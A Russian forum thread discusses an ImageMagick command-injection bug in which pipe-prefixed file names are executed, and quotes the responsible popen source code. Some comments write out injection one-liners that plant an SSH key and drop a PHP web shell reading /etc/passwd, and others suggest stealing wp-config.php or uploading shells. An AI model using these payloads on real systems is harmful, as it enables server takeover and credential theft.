Ещё одна критическая уязвимость в ImageMagick

SVG

Сдаётся мне, пофиксят в стиле а-ля «gopher в IE».

При чём тут недопустимые символы, если имя файла запускается на выполнение вместо открытия файла?

РЕ-ШЕ-ТО.

ШАПИТО

Вероятно имя файла передаётся внешней команде (может быть даже себе) через вызов shell.

ШЕРЕТО!!!

А это разве уязвимость? Ведь, например, повысить привилегии нельзя. Так можно любой скрипт считать уязвимостью, а тот с драйверами для видюхи, который /usr сносил, так вообще можно как мегазловред классифицировать. Разве это не ошибка или кривая архитектура? Подскажите мне где я ошибся.

А это разве уязвимость?

Мне почему-то вот это в голову пришло:

$ convert '| echo ATTACKER_PUBLIC_KEY >> ~/.ssh/authorized_keys' null:

А некоторые веб-сервер от рута запускают.

Разве это не ошибка или кривая архитектура?

Это ошибка или кривая архитектура, которая является причиной уязвимости.

Дружба это магия.

Прикол в том, что иногда на веб-сервисах для конвертации картинок угадай что используют. И тут ты берёшь и грузишь спец svg на него

грузить свг разрешают полтора «больших» картинко-хостинга мировых

но даже на них,даже допустим взять сурсфорж или гитхаб(на которых это можно)-так что вы получите-вы получите доступ в «десятиминутную»(время жизни 10мин) созданную виртуалку линукса.....и все
сейчас все что аплоадится-через виртуалку....

удачи выбираться из виртуалки

неприменимо в реальных услових

только против одминов локалхостов

Конечно уязвимость. Подставь например вместо

convert '|echo Hello > hello.txt;' null:

Вот это:

convert '| echo "<?php system(\"cat /etc/passwd\"); ?>" > exec.php;' null:

и вызови через браузер exec.php - получишь содержимое /etc/passwd (или любую другую команду под пользователем веб-сервера).

А некоторые веб-сервер от рута запускают.

оО вообще никогда с таким не сталкивался. Разве что в 2000-ых когда весь софт с сорцов собирали руками и пускали потом получившиеся бинарники, не создав отдельного юзера :)

получишь содержимое /etc/passwd.

Ну и зачем оно тебе может быть надо?

Ну так содержимое /etc/passwd тупо для примера. Можешь посмотреть содержимое wp-config.php, закачать скрипт adminer и получить доступ к базе. Или шелл туда залить с файловым менеджером. Короче на что фантазии хватит.

Как хорошо пользоваться optipng/jpegoptim и прочим «неприметным» ПО.

ImageMagick

Страдай.

Мне почему-то вот это в голову пришло:

+ беспарольный sudo, шеллкод, гадость в /tmp + /lib/ld.so и т.д.

Да эх, раз, ещё раз, ещё много-много раз.

Не пойму тебе есть, что скрывать?

Уязвимость заключается в отсутствии проверки имени файлов на наличие недопустимых символов

Кретины блин... Какая еще проверка на символ? На кой они имя файла на исполнение отправляют?!

И вот теперь вставят костыль, из-за которого не все имена файлов будут обрабатываться.

Какая еще проверка на символ?

Добро пожаловать в мир Шindoшs.

Там и так костыль:

 2483 #if defined(MAGICKCORE_HAVE_POPEN)
 2484   if (*filename == '|')
 2485     {
 2486       char
 2487         fileMode[MagickPathExtent];
 2488 
 2489       /*
 2490         Pipe image to or from a system command.
 2491       */
 2492 #if defined(SIGPIPE)
 2493       if (*type == 'w')
 2494         (void) signal(SIGPIPE,SIG_IGN);
 2495 #endif
 2496       *fileMode =(*type);
 2497       fileMode[1]='\0';
 2498       image->blob->file_info.file=(FILE *) popen_utf8(filename+1, fileMode);
 2499       if (image->blob->file_info.file == (FILE *) NULL)
 2500         {
 2501           ThrowFileException(exception,BlobError,"UnableToOpenBlob",filename);
 2502           return(MagickFalse);
 2503         }
 2504       image->blob->type=PipeStream;
 2505       image->blob->exempt=MagickTrue;
 2506       return(SetStreamBuffering(image_info,image));
 2507     }
 2508 #endif

причем очень эпичный + си головного мозга

Костыли нам строить и жить помогают…

Сомневаюсь что im используют для «оптимизации». Обычно это ресайз/ватермарки и прочие извращения.

си головного мозга

Да обычный говнокод это. Не более и не менее. А за «гениальную идею» надо по голове настучать.

А. Просто все что делал с изображениями в «терминальном окружении» – сжимал и вырезал ненужные мета-данные. Все манипуляции всегда делались из ЯП, через библиотеки, поэтому запустить оттуда консольный shell было бы невозможно. Все равно это проблемы тех, кто запускает конвертер в tty.

Чтобы энкоднуть в жпег да срезать метаданные его как-то многовато будет. Смотря какие либы, вдруг там exec, а не биндинги.

Чтобы энкоднуть в жпег да срезать метаданные его как-то многовато будет.

Ну да, вот для этого я и юзал всякие optipng/etc.

Смотря какие либы, вдруг там exec, а не биндинги.

Я изучаю код _небольших_ библиотек по мере возможности, перед тем как использовать.

Как раз для подобных случаев очень полезны фичи systemd типа RootDirectory=, InaccessibleDirectories= и прочее.

возможна атака с помощью специально сформированных SVG-файлов

На то он и SVG. Там миллионы способов все сломать. Зачем вообще было создать формат, который поддерживает скрипты на JS и загрузку внешних ресурсов?

Увы, альтернатив у SVG, пока, нет.

Я плакал!

HTML предлагаешь выбросить? SVG в сабже вообще не при чём.

Для повышения привилегий можно использовать другую уязвимость, для которой нужен шелл. Такие переодически всплывают. Вот так бац, две дерьмовые архитектуры друг на друга наложились и у тебя увели сервер.

При чём тут HTML? Речь о SVG и тулзе для обработки изображений.

Поясни плз. То есть он позволяет произвести своеобразную изоляцию приложения не допустив проникновения в другие файлы системы?

Зачем вообще было создать формат, который поддерживает скрипты на JS и загрузку внешних ресурсов?

а нука скажи мне

зачем создавать «язык программирования» который лоадит файлы напрямую с гитхаба и их исполняет....(угадаешь о чем я,не о джаваскрипте очевидно?)

велкам ту 2016

Если писать код с умом — нужно много времени. За это время кто-то напишет по-быстрее и с багами и все будут использовать этот софт.

Изоляцию - никак, а вот, например, затруднить повышение привелегий - вполне: /tmp изолирован, /home не читается, из файлов устройств только /dev/null и /dev/zero. Это не гарантирует невозможность эскалации (SELinux не заменит), но заставляет атакующего морщить лоб (и настраивается добаdлением одной строчки в юнит-файл).

зашибись, спасибо, не знал про такую опцию systemd, буду использовать

ох уж эти запятые...

Это опенсорс. Стабильно, надёжно!

Огласите весь список, пожалуйста. Чего уж там ...

В качестве дополнения к документации можешь посмотреть на юниты различных частей самого systemd - там это вовсю используется.

люди подскажите как изменить разрешение с обрезкой лишнего

Здравствуйте, Билли!

Подарите, пожалуйста, 2-3 миллиарда долларов...

У вас же их много...

Здравствуйте!

В настоящее время для Windows - около 7 000 000 вирусов.